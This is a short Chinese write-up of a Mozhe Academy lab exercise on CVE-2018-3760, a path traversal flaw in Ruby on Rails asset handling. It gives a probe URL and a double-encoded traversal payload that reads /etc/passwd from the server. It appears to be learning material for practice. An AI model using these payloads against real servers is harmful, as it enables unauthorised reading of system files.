墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

打开 web 页面:

发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞:

cs 复制代码
/assets/file:%2f%2f/etc/passwd

根据报错路劲构造 payload:

/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

cs 复制代码
/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd
相关推荐
刺猬-----13 分钟前
OSPF多区域
网络
rannn_1111 小时前
【MySQL学习|黑马笔记|Day1】数据库概述,SQL|通用语法、SQL分类、DDL
数据库·后端·学习·mysql
超浪的晨1 小时前
JavaWeb 入门:HTML 基础与实战详解(Java 开发者视角)
java·开发语言·前端·后端·html·个人开发
程序员爱钓鱼1 小时前
Go语言实战案例-计算字符串编辑距离
后端·google·go
程序员爱钓鱼1 小时前
Go语言实战案例-判断二叉树是否对称
后端·google·go
Victor3561 小时前
MySQL(165)MySQL如何处理并发控制?
后端
chirrupy_hamal1 小时前
如何提升 TCP 传输数据的性能?详解
linux·网络·tcp
风象南2 小时前
用 4 张图解释 CAP 到底在纠结什么
java·分布式·后端
源远流长jerry2 小时前
网络编程概述与UDP编程
linux·服务器·网络·网络协议·udp
程序员良辰2 小时前
网络协议:计算机世界的“交通规则“与“社交礼仪“
网络·网络协议